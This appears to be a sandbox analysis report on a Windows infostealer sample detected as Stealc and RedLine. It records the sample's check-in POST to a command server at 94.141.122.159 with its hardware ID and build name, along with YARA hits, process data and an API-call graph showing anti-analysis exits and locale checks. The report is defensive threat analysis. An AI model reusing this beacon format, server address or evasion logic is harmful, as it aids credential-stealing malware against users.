                                              Date: Sat, 26 Oct 2024 17:22:28 GMT
                                              Server: Apache/2.4.41 (Ubuntu)
                                              Content-Length: 0
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Oct 26, 2024 19:22:28.281810045 CEST418OUTPOST /baf27292fb61e144.php HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGI
                                              Host: 94.141.122.159
                                              Content-Length: 217
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 33 42 41 42 45 38 31 44 44 33 41 34 30 34 33 37 32 38 33 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 2d 2d 0d 0a
                                              Data Ascii: ------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="hwid"13BABE81DD3A4043728354------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="build"LogsDiller------KJDGDBFBGIDGIEBGHCGI--
                                              Oct 26, 2024 19:22:28.565334082 CEST210INHTTP/1.1 200 OK
                                              Date: Sat, 26 Oct 2024 17:22:28 GMT
                                              Server: Apache/2.4.41 (Ubuntu)
                                              Content-Length: 8
                                              Keep-Alive: timeout=5, max=99
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 59 6d 78 76 59 32 73 3d
                                              Data Ascii: YmxvY2s=


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:13:22:20
                                              Start date:26/10/2024
                                              Path:C:\Users\user\Desktop\uCEeVGAWIB.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\uCEeVGAWIB.exe"
                                              Imagebase:0x400000
                                              File size:401'408 bytes
                                              MD5 hash:9A4891BCF21B6639412F96C108A27744
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2241173522.000000000089A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2173056951.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              Target ID:5
                                              Start time:13:22:27
                                              Start date:26/10/2024
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1120 -s 1052
                                              Imagebase:0x150000
                                              File size:483'680 bytes
                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:7.4%
                                                Dynamic/Decrypted Code Coverage:4.9%
                                                Signature Coverage:12.2%
                                                Total number of Nodes:1418
                                                Total number of Limit Nodes:28
                                                execution_graph 27686 409440 strlen malloc strcpy_s free std::exception::exception 27687 823823 StrCmpCA StrCmpCA StrCmpCA strtok_s 27727 82118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27755 41ce48 LeaveCriticalSection __initptd 27688 82102b StrCmpCA strtok_s 27728 82cd8f 6 API calls 2 library calls 27690 41b050 6 API calls 3 library calls 27758 82ae93 43 API calls ctype 27759 820297 149 API calls 27791 406f60 memcpy 27691 41dc60 atexit 27730 82cd90 173 API calls 3 library calls 27792 410765 267 API calls 27761 417667 lstrcpy 27762 8232ae 22 API calls 27694 82d0af RtlLeaveCriticalSection type_info::_Type_info_dtor 27671 89aba6 27672 89abb5 27671->27672 27675 89b346 27672->27675 27681 89b361 27675->27681 27676 89b36a CreateToolhelp32Snapshot 27677 89b386 Module32First 27676->27677 27676->27681 27678 89abbe 27677->27678 27679 89b395 27677->27679 27682 89b005 27679->27682 27681->27676 27681->27677 27683 89b030 27682->27683 27684 89b079 27683->27684 27685 89b041 VirtualAlloc 27683->27685 27684->27684 27685->27684 27763 41b270 5 API calls 2 library calls 27695 820cb6 30 API calls 27696 8204b7 88 API calls 27766 816ebc VirtualProtect 27794 8213c7 strtok_s strtok_s 27699 82102b StrCmpCA StrCmpCA strtok_s 27701 41bc11 71 API calls 2 library calls 27702 8230d0 9 API calls 27705 823823 10 API calls 27733 8219e7 6 API calls 27734 8235e4 9 API calls 27707 82cce9 162 API calls getSystemCP 27708 41ac2c 71 API calls 2 library calls 27709 8230f9 7 API calls 27710 4090c3 5 API calls allocator 27644 810005 27649 81092b GetPEB 27644->27649 27646 810030 27650 81003c 27646->27650 27649->27646 27651 810049 27650->27651 27665 810e0f SetErrorMode SetErrorMode 27651->27665 27656 810265 27657 8102ce VirtualProtect 27656->27657 27659 81030b 27657->27659 27658 810439 VirtualFree 27663 8105f4 LoadLibraryA 27658->27663 27664 8104be 27658->27664 27659->27658 27660 8104e3 LoadLibraryA 27660->27664 27662 8108c7 27663->27662 27664->27660 27664->27663 27666 810223 27665->27666 27667 810d90 27666->27667 27668 810dad 27667->27668 27669 810dbb GetPEB 27668->27669 27670 810238 VirtualAlloc 27668->27670 27669->27670 27670->27656 27740 82d106 41 API calls __amsg_exit 27775 826a0a ExitProcess 27776 8215b3 18 API calls ctype 27800 41abd0 free codecvt std::exception::_Tidy 27802 8212eb strtok_s lstrlen lstrcpy 27803 413916 88 API calls 2 library calls 27804 4183dc 15 API calls 27713 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27744 821525 strtok_s strtok_s lstrlen lstrcpy ctype 27780 41ceea SetUnhandledExceptionFilter 27805 81932a ??2@YAPAXI RaiseException allocator 26226 4169f0 26269 402260 26226->26269 26243 417850 3 API calls 26244 416a30 26243->26244 26245 4178e0 3 API calls 26244->26245 26246 416a43 26245->26246 26402 41a9b0 26246->26402 26248 416a64 26249 41a9b0 4 API calls 26248->26249 26250 416a6b 26249->26250 26251 41a9b0 4 API calls 26250->26251 26252 416a72 26251->26252 26253 41a9b0 4 API calls 26252->26253 26254 416a79 26253->26254 26255 41a9b0 4 API calls 26254->26255 26256 416a80 26255->26256 26410 41a8a0 26256->26410 26258 416b0c 26414 416920 GetSystemTime 26258->26414 26260 416a89 26260->26258 26262 416ac2 OpenEventA 26260->26262 26264 416af5 CloseHandle Sleep 26262->26264 26265 416ad9 26262->26265 26266 416b0a 26264->26266 26268 416ae1 CreateEventA 26265->26268 26266->26260 26267 416b16 CloseHandle ExitProcess 26268->26258 26611 4045c0 17 API calls 26269->26611 26271 402274 26272 4045c0 34 API calls 26271->26272 26273 40228d 26272->26273 26274 4045c0 34 API calls 26273->26274 26275 4022a6 26274->26275 26276 4045c0 34 API calls 26275->26276 26277 4022bf 26276->26277 26278 4045c0 34 API calls 26277->26278 26279 4022d8 26278->26279 26280 4045c0 34 API calls 26279->26280 26281 4022f1 26280->26281 26282 4045c0 34 API calls 26281->26282 26283 40230a 26282->26283 26284 4045c0 34 API calls 26283->26284 26285 402323 26284->26285 26286 4045c0 34 API calls 26285->26286 26287 40233c 26286->26287 26288 4045c0 34 API calls 26287->26288 26289 402355 26288->26289 26290 4045c0 34 API calls 26289->26290 26291 40236e 26290->26291 26292 4045c0 34 API calls 26291->26292 26293 402387 26292->26293 26294 4045c0 34 API calls 26293->26294 26295 4023a0 26294->26295 26296 4045c0 34 API calls 26295->26296 26297 4023b9 26296->26297 26298 4045c0 34 API calls 26297->26298 26299 4023d2 26298->26299 26300 4045c0 34 API calls 26299->26300 26301 4023eb 26300->26301 26302 4045c0 34 API calls 26301->26302 26303 402404 26302->26303 26304 4045c0 34 API calls 26303->26304 26305 40241d 26304->26305 26306 4045c0 34 API calls 26305->26306 26307 402436 26306->26307 26308 4045c0 34 API calls 26307->26308 26309 40244f 26308->26309 26310 4045c0 34 API calls 26309->26310 26311 402468 26310->26311 26312 4045c0 34 API calls 26311->26312 26313 402481 26312->26313 26314 4045c0 34 API calls 26313->26314 26315 40249a 26314->26315 26316 4045c0 34 API calls 26315->26316 26317 4024b3 26316->26317 26318 4045c0 34 API calls 26317->26318 26319 4024cc 26318->26319 26320 4045c0 34 API calls 26319->26320 26321 4024e5 26320->26321 26322 4045c0 34 API calls 26321->26322 26323 4024fe 26322->26323 26324 4045c0 34 API calls 26323->26324 26325 402517 26324->26325 26326 4045c0 34 API calls 26325->26326 26327 402530 26326->26327 26328 4045c0 34 API calls 26327->26328 26329 402549 26328->26329 26330 4045c0 34 API calls 26329->26330 26331 402562 26330->26331 26332 4045c0 34 API calls 26331->26332 26333 40257b 26332->26333 26334 4045c0 34 API calls 26333->26334 26335 402594 26334->26335 26336 4045c0 34 API calls 26335->26336 26337 4025ad 26336->26337 26338 4045c0 34 API calls 26337->26338 26339 4025c6 26338->26339 26340 4045c0 34 API calls 26339->26340 26341 4025df 26340->26341 26342 4045c0 34 API calls 26341->26342 26343 4025f8 26342->26343 26344 4045c0 34 API calls 26343->26344 26345 402611 26344->26345 26346 4045c0 34 API calls 26345->26346 26347 40262a 26346->26347 26348 4045c0 34 API calls 26347->26348 26349 402643 26348->26349 26350 4045c0 34 API calls 26349->26350 26351 40265c 26350->26351 26352 4045c0 34 API calls 26351->26352 26353 402675 26352->26353 26354 4045c0 34 API calls 26353->26354 26355 40268e 26354->26355 26356 419860 26355->26356 26615 419750 GetPEB 26356->26615 26358 419868 26359 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26358->26359 26360 41987a 26358->26360 26361 419af4 GetProcAddress 26359->26361 26362 419b0d 26359->26362 26363 41988c 21 API calls 26360->26363 26361->26362 26364 419b46 26362->26364 26365 419b16 GetProcAddress GetProcAddress 26362->26365 26363->26359 26366 419b68 26364->26366 26367 419b4f GetProcAddress 26364->26367 26365->26364 26368 419b71 GetProcAddress 26366->26368 26369 419b89 26366->26369 26367->26366 26368->26369 26370 416a00 26369->26370 26371 419b92 GetProcAddress GetProcAddress 26369->26371 26372 41a740 26370->26372 26371->26370 26373 41a750 26372->26373 26374 416a0d 26373->26374 26375 41a77e lstrcpy 26373->26375 26376 4011d0 26374->26376 26375->26374 26377 4011e8 26376->26377 26378 401217 26377->26378 26379 40120f ExitProcess 26377->26379 26380 401160 GetSystemInfo 26378->26380 26381 401184 26380->26381 26382 40117c ExitProcess 26380->26382 26383 401110 GetCurrentProcess VirtualAllocExNuma 26381->26383 26384 401141 ExitProcess 26383->26384 26385 401149 26383->26385 26616 4010a0 VirtualAlloc 26385->26616 26388 401220 26620 4189b0 26388->26620 26391 401249 __aulldiv 26392 40129a 26391->26392 26393 401292 ExitProcess 26391->26393 26394 416770 GetUserDefaultLangID 26392->26394 26395 4167d3 GetUserDefaultLCID 26394->26395 26396 416792 26394->26396 26395->26243 26396->26395 26397 4167c1 ExitProcess 26396->26397 26398 4167a3 ExitProcess 26396->26398 26399 4167b7 ExitProcess 26396->26399 26400 4167cb ExitProcess 26396->26400 26401 4167ad ExitProcess 26396->26401 26622 41a710 26402->26622 26404 41a9c1 lstrlenA 26406 41a9e0 26404->26406 26405 41aa18 26623 41a7a0 26405->26623 26406->26405 26408 41a9fa lstrcpy lstrcatA 26406->26408 26408->26405 26409 41aa24 26409->26248 26411 41a8bb 26410->26411 26412 41a90b 26411->26412 26413 41a8f9 lstrcpy 26411->26413 26412->26260 26413->26412 26627 416820 26414->26627 26416 41698e 26417 416998 sscanf 26416->26417 26656 41a800 26417->26656 26419 4169aa SystemTimeToFileTime SystemTimeToFileTime 26420 4169e0 26419->26420 26421 4169ce 26419->26421 26423 415b10 26420->26423 26421->26420 26422 4169d8 ExitProcess 26421->26422 26424 415b1d 26423->26424 26425 41a740 lstrcpy 26424->26425 26426 415b2e 26425->26426 26658 41a820 lstrlenA 26426->26658 26429 41a820 2 API calls 26430 415b64 26429->26430 26431 41a820 2 API calls 26430->26431 26432 415b74 26431->26432 26662 416430 26432->26662 26435 41a820 2 API calls 26436 415b93 26435->26436 26437 41a820 2 API calls 26436->26437 26438 415ba0 26437->26438 26439 41a820 2 API calls 26438->26439 26440 415bad 26439->26440 26441 41a820 2 API calls 26440->26441 26442 415bf9 26441->26442 26671 4026a0 26442->26671 26450 415cc3 26451 416430 lstrcpy 26450->26451 26452 415cd5 26451->26452 26453 41a7a0 lstrcpy 26452->26453 26454 415cf2 26453->26454 26455 41a9b0 4 API calls 26454->26455 26456 415d0a 26455->26456 26457 41a8a0 lstrcpy 26456->26457 26458 415d16 26457->26458 26459 41a9b0 4 API calls 26458->26459 26460 415d3a 26459->26460 26461 41a8a0 lstrcpy 26460->26461 26462 415d46 26461->26462 26463 41a9b0 4 API calls 26462->26463 26464 415d6a 26463->26464 26465 41a8a0 lstrcpy 26464->26465 26466 415d76 26465->26466 26467 41a740 lstrcpy 26466->26467 26468 415d9e 26467->26468 27397 417500 GetWindowsDirectoryA 26468->27397 26471 41a7a0 lstrcpy 26472 415db8 26471->26472 27407 404880 26472->27407 26474 415dbe 27553 4117a0 26474->27553 26476 415dc6 26477 41a740 lstrcpy 26476->26477 26478 415de9 26477->26478 26479 401590 lstrcpy 26478->26479 26480 415dfd 26479->26480 27573 405960 39 API calls codecvt 26480->27573 26482 415e03 27574 411050 strtok_s strtok_s lstrlenA lstrcpy 26482->27574 26484 415e0e 26485 41a740 lstrcpy 26484->26485 26486 415e32 26485->26486 26487 401590 lstrcpy 26486->26487 26488 415e46 26487->26488 27575 405960 39 API calls codecvt 26488->27575 26490 415e4c 27576 410d90 7 API calls 26490->27576 26492 415e57 26493 41a740 lstrcpy 26492->26493 26494 415e79 26493->26494 26495 401590 lstrcpy 26494->26495 26496 415e8d 26495->26496 27577 405960 39 API calls codecvt 26496->27577 26498 415e93 27578 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26498->27578 26500 415e9e 26501 401590 lstrcpy 26500->26501 26502 415eb5 26501->26502 27579 411a10 121 API calls 26502->27579 26504 415eba 26505 41a740 lstrcpy 26504->26505 26506 415ed6 26505->26506 27580 404fb0 8 API calls 26506->27580 26508 415edb 26509 401590 lstrcpy 26508->26509 26510 415f5b 26509->26510 27581 410740 280 API calls 26510->27581 26512 415f60 26513 41a740 lstrcpy 26512->26513 26514 415f86 26513->26514 26515 401590 lstrcpy 26514->26515 26516 415f9a 26515->26516 27582 405960 39 API calls codecvt 26516->27582 26518 415fa0 27583 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26518->27583 26520 415fab 26521 401590 lstrcpy 26520->26521 26522 415feb 26521->26522 27584 401e80 65 API calls 26522->27584 26524 415ff0 26525 416000 26524->26525 26526 416092 26524->26526 26527 41a740 lstrcpy 26525->26527 26528 41a7a0 lstrcpy 26526->26528 26529 416020 26527->26529 26530 4160a5 26528->26530 26532 401590 lstrcpy 26529->26532 26531 401590 lstrcpy 26530->26531 26533 4160b9 26531->26533 26534 416034 26532->26534 27588 405960 39 API calls codecvt 26533->27588 27585 405960 39 API calls codecvt 26534->27585 26537 4160bf 27589 413560 36 API calls 26537->27589 26538 41603a 27586 4112d0 21 API calls codecvt 26538->27586 26541 41608a 26544 41610b 26541->26544 26547 401590 lstrcpy 26541->26547 26542 416045 26543 401590 lstrcpy 26542->26543 26545 416085 26543->26545 26546 416130 26544->26546 26549 401590 lstrcpy 26544->26549 27587 413dc0 73 API calls 26545->27587 26550 416155 26546->26550 26553 401590 lstrcpy 26546->26553 26551 4160e7 26547->26551 26552 41612b 26549->26552 26555 41617a 26550->26555 26560 401590 lstrcpy 26550->26560 27590 4140b0 62 API calls codecvt 26551->27590 27592 414780 114 API calls codecvt 26552->27592 26558 416150 26553->26558 26556 41619f 26555->26556 26561 401590 lstrcpy 26555->26561 26562 4161c4 26556->26562 26568 401590 lstrcpy 26556->26568 27593 414bb0 65 API calls codecvt 26558->27593 26559 4160ec 26564 401590 lstrcpy 26559->26564 26565 416175 26560->26565 26567 41619a 26561->26567 26570 4161e9 26562->26570 26571 401590 lstrcpy 26562->26571 26569 416106 26564->26569 27594 414d70 73 API calls 26565->27594 27595 414f40 67 API calls codecvt 26567->27595 26574 4161bf 26568->26574 27591 415100 71 API calls 26569->27591 26572 416210 26570->26572 26577 401590 lstrcpy 26570->26577 26576 4161e4 26571->26576 26578 416220 26572->26578 26579 4162b3 26572->26579 27596 407710 125 API calls codecvt 26574->27596 27597 415050 65 API calls codecvt 26576->27597 26582 416209 26577->26582 26584 41a740 lstrcpy 26578->26584 26583 41a7a0 lstrcpy 26579->26583 27598 419010 54 API calls codecvt 26582->27598 26586 4162c6 26583->26586 26587 416241 26584->26587 26588 401590 lstrcpy 26586->26588 26589 401590 lstrcpy 26587->26589 26590 4162da 26588->26590 26591 416255 26589->26591 27602 405960 39 API calls codecvt 26590->27602 27599 405960 39 API calls codecvt 26591->27599 26594 41625b 27600 4112d0 21 API calls codecvt 26594->27600 26595 4162e0 27603 413560 36 API calls 26595->27603 26598 4162ab 26601 41a7a0 lstrcpy 26598->26601 26599 416266 26600 401590 lstrcpy 26599->26600 26602 4162a6 26600->26602 26603 4162fc 26601->26603 27601 413dc0 73 API calls 26602->27601 26605 401590 lstrcpy 26603->26605 26606 416310 26605->26606 27604 405960 39 API calls codecvt 26606->27604 26608 41631c 26610 416338 26608->26610 27605 416630 9 API calls codecvt 26608->27605 26610->26267 26614 404697 26611->26614 26612 4046ac 11 API calls 26612->26614 26613 40474f 6 API calls 26613->26271 26614->26612 26614->26613 26615->26358 26618 4010c2 codecvt 26616->26618 26617 4010fd 26617->26388 26618->26617 26619 4010e2 VirtualFree 26618->26619 26619->26617 26621 401233 GlobalMemoryStatusEx 26620->26621 26621->26391 26622->26404 26624 41a7c2 26623->26624 26625 41a7ec 26624->26625 26626 41a7da lstrcpy 26624->26626 26625->26409 26626->26625 26628 41a740 lstrcpy 26627->26628 26629 416833 26628->26629 26630 41a9b0 4 API calls 26629->26630 26631 416845 26630->26631 26632 41a8a0 lstrcpy 26631->26632 26633 41684e 26632->26633 26634 41a9b0 4 API calls 26633->26634 26635 416867 26634->26635 26636 41a8a0 lstrcpy 26635->26636 26637 416870 26636->26637 26638 41a9b0 4 API calls 26637->26638 26639 41688a 26638->26639 26640 41a8a0 lstrcpy 26639->26640 26641 416893 26640->26641 26642 41a9b0 4 API calls 26641->26642 26643 4168ac 26642->26643 26644 41a8a0 lstrcpy 26643->26644 26645 4168b5 26644->26645 26646 41a9b0 4 API calls 26645->26646 26647 4168cf 26646->26647 26648 41a8a0 lstrcpy 26647->26648 26649 4168d8 26648->26649 26650 41a9b0 4 API calls 26649->26650 26651 4168f3 26650->26651 26652 41a8a0 lstrcpy 26651->26652 26653 4168fc 26652->26653 26654 41a7a0 lstrcpy 26653->26654 26655 416910 26654->26655 26655->26416 26657 41a812 26656->26657 26657->26419 26659 41a83f 26658->26659 26660 415b54 26659->26660 26661 41a87b lstrcpy 26659->26661 26660->26429 26661->26660 26663 41a8a0 lstrcpy 26662->26663 26664 416443 26663->26664 26665 41a8a0 lstrcpy 26664->26665 26666 416455 26665->26666 26667 41a8a0 lstrcpy 26666->26667 26668 416467 26667->26668 26669 41a8a0 lstrcpy 26668->26669 26670 415b86 26669->26670 26670->26435 26672 4045c0 34 API calls 26671->26672 26673 4026b4 26672->26673 26674 4045c0 34 API calls 26673->26674 26675 4026d7 26674->26675 26676 4045c0 34 API calls 26675->26676 26677 4026f0 26676->26677 26678 4045c0 34 API calls 26677->26678 26679 402709 26678->26679 26680 4045c0 34 API calls 26679->26680 26681 402736 26680->26681 26682 4045c0 34 API calls 26681->26682 26683 40274f 26682->26683 26684 4045c0 34 API calls 26683->26684 26685 402768 26684->26685 26686 4045c0 34 API calls 26685->26686 26687 402795 26686->26687 26688 4045c0 34 API calls 26687->26688 26689 4027ae 26688->26689 26690 4045c0 34 API calls 26689->26690 26691 4027c7 26690->26691 26692 4045c0 34 API calls 26691->26692 26693 4027e0 26692->26693 26694 4045c0 34 API calls 26693->26694 26695 4027f9 26694->26695 26696 4045c0 34 API calls 26695->26696 26697 402812 26696->26697 26698 4045c0 34 API calls 26697->26698 26699 40282b 26698->26699 26700 4045c0 34 API calls 26699->26700 26701 402844 26700->26701 26702 4045c0 34 API calls 26701->26702 26703 40285d 26702->26703 26704 4045c0 34 API calls 26703->26704 26705 402876 26704->26705 26706 4045c0 34 API calls 26705->26706 26707 40288f 26706->26707 26708 4045c0 34 API calls 26707->26708 26709 4028a8 26708->26709 26710 4045c0 34 API calls 26709->26710 26711 4028c1 26710->26711 26712 4045c0 34 API calls 26711->26712 26713 4028da 26712->26713 26714 4045c0 34 API calls 26713->26714 26715 4028f3 26714->26715 26716 4045c0 34 API calls 26715->26716 26717 40290c 26716->26717 26718 4045c0 34 API calls 26717->26718 26719 402925 26718->26719 26720 4045c0 34 API calls 26719->26720 26721 40293e 26720->26721 26722 4045c0 34 API calls 26721->26722 26723 402957 26722->26723 26724 4045c0 34 API calls 26723->26724 26725 402970 26724->26725 26726 4045c0 34 API calls 26725->26726 26727 402989 26726->26727 26728 4045c0 34 API calls 26727->26728 26729 4029a2 26728->26729 26730 4045c0 34 API calls 26729->26730 26731 4029bb 26730->26731 26732 4045c0 34 API calls 26731->26732 26733 4029d4 26732->26733 26734 4045c0 34 API calls 26733->26734 26735 4029ed 26734->26735 26736 4045c0 34 API calls 26735->26736 26737 402a06 26736->26737 26738 4045c0 34 API calls 26737->26738 26739 402a1f 26738->26739 26740 4045c0 34 API calls 26739->26740 26741 402a38 26740->26741 26742 4045c0 34 API calls 26741->26742 26743 402a51 26742->26743 26744 4045c0 34 API calls 26743->26744 26745 402a6a 26744->26745 26746 4045c0 34 API calls 26745->26746 26747 402a83 26746->26747 26748 4045c0 34 API calls 26747->26748 26749 402a9c 26748->26749 26750 4045c0 34 API calls 26749->26750 26751 402ab5 26750->26751 26752 4045c0 34 API calls 26751->26752 26753 402ace 26752->26753 26754 4045c0 34 API calls 26753->26754 26755 402ae7 26754->26755 26756 4045c0 34 API calls 26755->26756 26757 402b00 26756->26757 26758 4045c0 34 API calls 26757->26758 26759 402b19 26758->26759 26760 4045c0 34 API calls 26759->26760 26761 402b32 26760->26761 26762 4045c0 34 API calls 26761->26762 26763 402b4b 26762->26763 26764 4045c0 34 API calls 26763->26764 26765 402b64 26764->26765 26766 4045c0 34 API calls 26765->26766 26767 402b7d 26766->26767 26768 4045c0 34 API calls 26767->26768 26769 402b96 26768->26769 26770 4045c0 34 API calls 26769->26770 26771 402baf 26770->26771 26772 4045c0 34 API calls 26771->26772 26773 402bc8 26772->26773 26774 4045c0 34 API calls 26773->26774 26775 402be1 26774->26775 26776 4045c0 34 API calls 26775->26776 26777 402bfa 26776->26777 26778 4045c0 34 API calls 26777->26778 26779 402c13 26778->26779 26780 4045c0 34 API calls 26779->26780 26781 402c2c 26780->26781 26782 4045c0 34 API calls 26781->26782 26783 402c45 26782->26783 26784 4045c0 34 API calls 26783->26784 26785 402c5e 26784->26785 26786 4045c0 34 API calls 26785->26786 26787 402c77 26786->26787 26788 4045c0 34 API calls 26787->26788 26789 402c90 26788->26789 26790 4045c0 34 API calls 26789->26790 26791 402ca9 26790->26791 26792 4045c0 34 API calls 26791->26792 26793 402cc2 26792->26793 26794 4045c0 34 API calls 26793->26794 26795 402cdb 26794->26795 26796 4045c0 34 API calls 26795->26796 26797 402cf4 26796->26797 26798 4045c0 34 API calls 26797->26798 26799 402d0d 26798->26799 26800 4045c0 34 API calls 26799->26800 26801 402d26 26800->26801 26802 4045c0 34 API calls 26801->26802 26803 402d3f 26802->26803 26804 4045c0 34 API calls 26803->26804 26805 402d58 26804->26805 26806 4045c0 34 API calls 26805->26806 26807 402d71 26806->26807 26808 4045c0 34 API calls 26807->26808 26809 402d8a 26808->26809 26810 4045c0 34 API calls 26809->26810 26811 402da3 26810->26811 26812 4045c0 34 API calls 26811->26812 26813 402dbc 26812->26813 26814 4045c0 34 API calls 26813->26814 26815 402dd5 26814->26815 26816 4045c0 34 API calls 26815->26816 26817 402dee 26816->26817 26818 4045c0 34 API calls 26817->26818 26819 402e07 26818->26819 26820 4045c0 34 API calls 26819->26820 26821 402e20 26820->26821 26822 4045c0 34 API calls 26821->26822 26823 402e39 26822->26823 26824 4045c0 34 API calls 26823->26824 26825 402e52 26824->26825 26826 4045c0 34 API calls 26825->26826 26827 402e6b 26826->26827 26828 4045c0 34 API calls 26827->26828 26829 402e84 26828->26829 26830 4045c0 34 API calls 26829->26830 26831 402e9d 26830->26831 26832 4045c0 34 API calls 26831->26832 26833 402eb6 26832->26833 26834 4045c0 34 API calls 26833->26834 26835 402ecf 26834->26835 26836 4045c0 34 API calls 26835->26836 26837 402ee8 26836->26837 26838 4045c0 34 API calls 26837->26838 26839 402f01 26838->26839 26840 4045c0 34 API calls 26839->26840 26841 402f1a 26840->26841 26842 4045c0 34 API calls 26841->26842 26843 402f33 26842->26843 26844 4045c0 34 API calls 26843->26844 26845 402f4c 26844->26845 26846 4045c0 34 API calls 26845->26846 26847 402f65 26846->26847 26848 4045c0 34 API calls 26847->26848 26849 402f7e 26848->26849 26850 4045c0 34 API calls 26849->26850 26851 402f97 26850->26851 26852 4045c0 34 API calls 26851->26852 26853 402fb0 26852->26853 26854 4045c0 34 API calls 26853->26854 26855 402fc9 26854->26855 26856 4045c0 34 API calls 26855->26856 26857 402fe2 26856->26857 26858 4045c0 34 API calls 26857->26858 26859 402ffb 26858->26859 26860 4045c0 34 API calls 26859->26860 26861 403014 26860->26861 26862 4045c0 34 API calls 26861->26862 26863 40302d 26862->26863 26864 4045c0 34 API calls 26863->26864 26865 403046 26864->26865 26866 4045c0 34 API calls 26865->26866 26867 40305f 26866->26867 26868 4045c0 34 API calls 26867->26868 26869 403078 26868->26869 26870 4045c0 34 API calls 26869->26870 26871 403091 26870->26871 26872 4045c0 34 API calls 26871->26872 26873 4030aa 26872->26873 26874 4045c0 34 API calls 26873->26874 26875 4030c3 26874->26875 26876 4045c0 34 API calls 26875->26876 26877 4030dc 26876->26877 26878 4045c0 34 API calls 26877->26878 26879 4030f5 26878->26879 26880 4045c0 34 API calls 26879->26880 26881 40310e 26880->26881 26882 4045c0 34 API calls 26881->26882 26883 403127 26882->26883 26884 4045c0 34 API calls 26883->26884 26885 403140 26884->26885 26886 4045c0 34 API calls 26885->26886 26887 403159 26886->26887 26888 4045c0 34 API calls 26887->26888 26889 403172 26888->26889 26890 4045c0 34 API calls 26889->26890 26891 40318b 26890->26891 26892 4045c0 34 API calls 26891->26892 26893 4031a4 26892->26893 26894 4045c0 34 API calls 26893->26894 26895 4031bd 26894->26895 26896 4045c0 34 API calls 26895->26896 26897 4031d6 26896->26897 26898 4045c0 34 API calls 26897->26898 26899 4031ef 26898->26899 26900 4045c0 34 API calls 26899->26900 26901 403208 26900->26901 26902 4045c0 34 API calls 26901->26902 26903 403221 26902->26903 26904 4045c0 34 API calls 26903->26904 26905 40323a 26904->26905 26906 4045c0 34 API calls 26905->26906 26907 403253 26906->26907 26908 4045c0 34 API calls 26907->26908 26909 40326c 26908->26909 26910 4045c0 34 API calls 26909->26910 26911 403285 26910->26911 26912 4045c0 34 API calls 26911->26912 26913 40329e 26912->26913 26914 4045c0 34 API calls 26913->26914 26915 4032b7 26914->26915 26916 4045c0 34 API calls 26915->26916 26917 4032d0 26916->26917 26918 4045c0 34 API calls 26917->26918 26919 4032e9 26918->26919 26920 4045c0 34 API calls 26919->26920 26921 403302 26920->26921 26922 4045c0 34 API calls 26921->26922 26923 40331b 26922->26923 26924 4045c0 34 API calls 26923->26924 26925 403334 26924->26925 26926 4045c0 34 API calls 26925->26926 26927 40334d 26926->26927 26928 4045c0 34 API calls 26927->26928 26929 403366 26928->26929 26930 4045c0 34 API calls 26929->26930 26931 40337f 26930->26931 26932 4045c0 34 API calls 26931->26932 26933 403398 26932->26933 26934 4045c0 34 API calls 26933->26934 26935 4033b1 26934->26935 26936 4045c0 34 API calls 26935->26936 26937 4033ca 26936->26937 26938 4045c0 34 API calls 26937->26938 26939 4033e3 26938->26939 26940 4045c0 34 API calls 26939->26940 26941 4033fc 26940->26941 